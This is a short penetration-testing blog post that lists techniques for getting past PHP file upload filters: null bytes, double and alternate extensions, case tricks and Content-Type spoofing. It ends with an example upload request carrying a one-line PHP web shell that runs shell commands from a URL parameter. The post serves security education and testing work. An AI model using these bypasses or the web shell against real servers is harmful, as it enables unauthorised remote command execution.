WebApp PHP - File Upload Bypass

1 minute read

Overview

Techniques gathered to bypass PHP file upload filters.

PHP Null Byte

photo.php%00.jpg

Only usable with older PHP versions ~<5.4

Apache Dual Extentions

photo.php.png

Apache has a setting were a file can have 2 extensions
Apache will process the file as either type based on the extensions

Alternate PHP Extentions

.phtml  .php3   .php4   .php5   .phps

There are many different file extensions for PHP.
Developers may blacklist *.php but forget *.php3

Case Sensitive Bypass

Developers may blacklist *.php using case sensitive regex
This can be bypassed with file.PhP

PHP File-Type Bypass

Typical of image uploads, developers will try to whitelist the allowed file types that may be uploaded.

if ((($_FILES["file"]["type"] == "image/gif") || 
   ($_FILES["file"]["type"] == "image/jpeg")|| 
   ($_FILES["file"]["type"] == "image/JPG") ||
   ($_FILES["file"]["type"] == "image/png") || 
   ($_FILES["file"]["type"] == "image/pjpeg"))

This can be bypassed by changing the Content-Type in the POST request sent to the server

Content-Disposition: form-data; name="file"; filename="magic.php"
Content-Type: image/png

<?php echo shell_exec($_GET["magic"]); ?>

External References

PentesterLab.blog - Bypassing File Upload Restrictions

Twitter Facebook LinkedIn

Bobby Cooke

WebApp PHP - File Upload Bypass

Overview

PHP Null Byte

Apache Dual Extentions

Alternate PHP Extentions

Case Sensitive Bypass

PHP File-Type Bypass

External References

You May Also Enjoy

Beginners Guide to 0day/CVE AppSec Research

Creating the WhereAmI Cobalt Strike BOF

The Art of the Device Code Phish

SLAE64 Assignment 2 - Remove Nulls TCP Reverse Shell